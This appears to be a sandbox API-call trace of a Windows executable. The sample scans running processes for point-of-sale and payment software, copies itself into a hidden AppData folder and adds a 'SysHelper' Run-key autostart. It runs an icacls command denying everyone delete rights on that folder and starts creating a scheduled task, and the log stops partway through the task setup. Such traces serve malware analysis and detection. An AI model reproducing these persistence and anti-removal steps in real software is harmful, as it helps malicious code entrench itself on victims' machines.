OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa84) returned 0x5c0 [0097.554] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.555] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xa40000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0097.555] CloseHandle (hObject=0x5c0) returned 1 [0097.555] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa94) returned 0x5c0 [0097.555] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.556] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xe50000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0097.556] CloseHandle (hObject=0x5c0) returned 1 [0097.557] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaa4) returned 0x5c0 [0097.557] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.558] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xad0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0097.558] CloseHandle (hObject=0x5c0) returned 1 [0097.558] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xab4) returned 0x5c0 [0097.558] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.559] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x2f0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0097.559] CloseHandle (hObject=0x5c0) returned 1 [0097.559] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xac4) returned 0x5c0 [0097.559] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.560] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0097.560] CloseHandle (hObject=0x5c0) returned 1 [0097.560] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xad4) returned 0x5c0 [0097.560] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.561] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x260000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0097.562] CloseHandle (hObject=0x5c0) returned 1 [0097.562] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xae4) returned 0x5c0 [0097.562] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.563] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x820000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0097.563] CloseHandle (hObject=0x5c0) returned 1 [0097.563] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaf4) returned 0x5c0 [0097.563] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.564] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1140000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0097.564] CloseHandle (hObject=0x5c0) returned 1 [0097.564] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb04) returned 0x5c0 [0097.564] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.565] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x340000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0097.566] CloseHandle (hObject=0x5c0) returned 1 [0097.566] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb14) returned 0x5c0 [0097.566] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.567] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xf50000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0097.567] CloseHandle (hObject=0x5c0) returned 1 [0097.567] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb24) returned 0x5c0 [0097.567] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.568] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1070000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0097.568] CloseHandle (hObject=0x5c0) returned 1 [0097.568] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb34) returned 0x5c0 [0097.568] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.569] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1320000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0097.569] CloseHandle (hObject=0x5c0) returned 1 [0097.569] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb44) returned 0x5c0 [0097.569] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.570] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xe80000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0097.571] CloseHandle (hObject=0x5c0) returned 1 [0097.571] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb54) returned 0x5c0 [0097.571] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.572] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x12a0000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="taste.exe") returned 0x9 [0097.572] CloseHandle (hObject=0x5c0) returned 1 [0097.572] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb64) returned 0x5c0 [0097.572] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.573] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x890000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="anniversary hat.exe") returned 0x13 [0097.573] CloseHandle (hObject=0x5c0) returned 1 [0097.573] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb74) returned 0x5c0 [0097.573] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.574] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1010000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="judy devices.exe") returned 0x10 [0097.574] CloseHandle (hObject=0x5c0) returned 1 [0097.574] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb84) returned 0x5c0 [0097.575] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.575] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x860000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="act.exe") returned 0x7 [0097.576] CloseHandle (hObject=0x5c0) returned 1 [0097.576] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb94) returned 0x5c0 [0097.576] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.577] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1160000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="fx-woman.exe") returned 0xc [0097.577] CloseHandle (hObject=0x5c0) returned 1 [0097.577] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc0) returned 0x0 [0097.577] CloseHandle (hObject=0x0) returned 0 [0097.577] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe4) returned 0x0 [0097.577] CloseHandle (hObject=0x0) returned 0 [0097.577] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x734) returned 0x5c0 [0097.577] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df7c, cb=0x4, lpcbNeeded=0x18df60 | out: lphModule=0x18df7c, lpcbNeeded=0x18df60) returned 1 [0097.579] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x400000, lpBaseName=0x18d760, nSize=0x400 | out: lpBaseName="YTHGRFED.EXE.exe") returned 0x10 [0097.579] CloseHandle (hObject=0x5c0) returned 1 [0097.586] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x28) returned 0x719b88 [0097.586] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x3316850 [0097.586] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x330cfa8 [0097.586] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x330d210 [0097.586] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x330d478 [0097.586] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x330d6e0 [0097.586] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x330d948 [0097.586] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x3302e20 [0097.586] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x3303088 [0097.586] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x33032f0 [0097.586] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x3303558 [0097.597] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18df60 | out: phkResult=0x18df60*=0x5c0) returned 0x0 [0097.598] RegQueryValueExW (in: hKey=0x5c0, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18df5c, lpData=0x18c688, lpcbData=0x18df40*=0x400 | out: lpType=0x18df5c*=0x0, lpData=0x18c688*=0x0, lpcbData=0x18df40*=0x400) returned 0x2 [0097.598] RegCloseKey (hKey=0x5c0) returned 0x0 [0097.598] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.598] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.598] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe\" " [0097.598] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe\" ", pNumArgs=0x18df24 | out: pNumArgs=0x18df24) returned 0x744b00*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" [0097.598] lstrcpyW (in: lpString1=0x18be88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" [0097.598] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe") returned="YTHGRFED.EXE.exe" [0097.598] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18d688 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0097.599] UuidCreate (in: Uuid=0x18ded4 | out: Uuid=0x18ded4) returned 0x0 [0097.599] UuidToStringW (in: Uuid=0x18ded4, StringUuid=0x18df68 | out: StringUuid=0x18df68) returned 0x0 [0097.599] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x50) returned 0x3339750 [0097.599] RpcMgmtStatsVectorFree (in: StatsVector=0x18df68 | out: StatsVector=0x18df68) returned 0x0 [0097.599] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="96cfdb85-ccb7-4261-9c45-a19b18c734ac" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac") returned 1 [0097.599] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac"), lpSecurityAttributes=0x0) returned 1 [0097.600] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xb0) returned 0x32b26b0 [0097.600] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xb0) returned 0x32b2768 [0097.600] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac", pMore="YTHGRFED.EXE.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe") returned 1 [0097.600] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\ythgrfed.exe.exe")) returned 0 [0097.600] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ythgrfed.exe.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\ythgrfed.exe.exe"), bFailIfExists=0) returned 1 [0097.677] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18df64 | out: phkResult=0x18df64*=0x5c4) returned 0x0 [0097.677] lstrcpyW (in: lpString1=0x18ce88, lpString2="\"" | out: lpString1="\"") returned="\"" [0097.677] lstrcatW (in: lpString1="\"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe" [0097.677] lstrcatW (in: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe", lpString2="\" --AutoStart" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe\" --AutoStart") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe\" --AutoStart" [0097.677] lstrlenW (lpString="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe\" --AutoStart") returned 111 [0097.677] RegSetValueExW (in: hKey=0x5c4, lpValueName="SysHelper", Reserved=0x0, dwType=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe\" --AutoStart", cbData=0xde | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe\" --AutoStart") returned 0x0 [0097.678] RegCloseKey (hKey=0x5c4) returned 0x0 [0097.678] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xd0) returned 0x32ad0a8 [0097.678] SetLastError (dwErrCode=0x0) [0097.678] lstrcpyW (in: lpString1=0x18ae88, lpString2="icacls \"" | out: lpString1="icacls \"") returned="icacls \"" [0097.678] lstrcatW (in: lpString1="icacls \"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac" [0097.678] lstrcatW (in: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac", lpString2="\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\" /deny *S-1-1-0:(OI)(CI)(DE,DC)") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" [0097.678] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x48, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18de88*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18dee4 | out: lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessInformation=0x18dee4*(hProcess=0x5c0, hThread=0x5c4, dwProcessId=0x824, dwThreadId=0x834)) returned 1 [0097.693] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0097.697] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0097.712] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0097.728] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0097.743] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0097.970] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.026] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.040] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.055] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.071] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.087] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.102] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.118] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.134] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.149] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.165] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.181] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.196] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.211] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.227] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.249] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.259] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.274] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.289] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.305] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.321] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.336] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.352] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.367] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.409] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.417] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.430] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.445] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.461] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.477] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.492] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.508] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0098.523] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x0 [0098.528] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32b2768 | out: hHeap=0x6f0000) returned 1 [0098.528] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3339750 | out: hHeap=0x6f0000) returned 1 [0098.528] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xd0) returned 0x32ad258 [0098.528] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xd0) returned 0x32ad330 [0098.528] CoInitialize (pvReserved=0x0) returned 0x0 [0099.571] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0099.578] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xd0) returned 0x32ad5b8 [0099.584] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18df4c | out: ppv=0x18df4c*=0x29f0b00) returned 0x0 [0100.011] TaskScheduler:ITaskService:Connect (This=0x29f0b00, serverName=0x18d9d8*(varType=0x0, wReserved1=0x7734, wReserved2=0xe0d2, wReserved3=0x7734, varVal1=0x67, varVal2=0xd0), user=0x18d9e8*(varType=0x0, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x0, varVal2=0xd8), domain=0x18d9f8*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), password=0x18da08*(varType=0x0, wReserved1=0x330, wReserved2=0xdef4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x6f0000)) returned 0x0 [0100.047] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x32f9378 [0100.047] TaskScheduler:ITaskService:GetFolder (in: This=0x29f0b00, Path="\\", ppFolder=0x18df54 | out: ppFolder=0x18df54*=0x30ff98) returned 0x0 [0100.094] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32f9378 | out: hHeap=0x6f0000) returned 1 [0100.094] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x32f9378 [0100.094] ITaskFolder:DeleteTask (This=0x30ff98, Name="Time Trigger Task", flags=0) returned 0x80070002 [0100.096] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32f9378 | out: hHeap=0x6f0000) returned 1 [0100.096] TaskScheduler:ITaskService:NewTask (in: This=0x29f0b00, flags=0x0, ppDefinition=0x18df58 | out: ppDefinition=0x18df58*=0x29f0b88) returned 0x0 [0100.098] TaskScheduler:IUnknown:Release (This=0x29f0b00) returned 0x1 [0100.098] ITaskDefinition:get_RegistrationInfo (in: This=0x29f0b88, ppRegistrationInfo=0x18df2c | out: ppRegistrationInfo=0x18df2c*=0x29f0c48) returned 0x0 [0100.098] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x32f93a8 [0100.099] IRegistrationInfo:put_Author (This=0x29f0c48, Author="Author Name") returned 0x0 [0100.099] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32f93a8 | out: hHeap=0x6f0000) returned 1 [0100.099] IUnknown:Release (This=0x29f0c48) returned 0x1 [0100.099] ITaskDefinition:get_Principal (in: This=0x29f0b88, ppPrincipal=0x18df34 | out: ppPrincipal=0x18df34*=0x29f0dd8) returned 0x0 [0100.099] IPrincipal:put_LogonType (This=0x29f0dd8, LogonType=3) returned 0x0 [0100.099] IUnknown:Release (This=0x29f0dd8) returned 0x1 [0100.099] ITaskDefinition:get_Settings (in: This=0x29f0b88, ppSettings=0x18df3c | out: ppSettings=0x18df3c*=0x29f0cf8) returned 0x0 [0100.099] ITaskSettings:put_StartWhenAvailable (This=0x29f0cf8, StartWhenAvailable=1) returned 0x0 [0100.100] IUnknown:Release (This=0x29f0cf8) returned 0x1 [0100.100] ITaskSettings:get_IdleSettings (in: This=0x29f0cf8, ppIdleSettings=0x18df20 | out: ppIdleSettings=0x18df20*=0x29f0d68) returned 0x0 [0100.100] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x32f93a8 [0100.100] 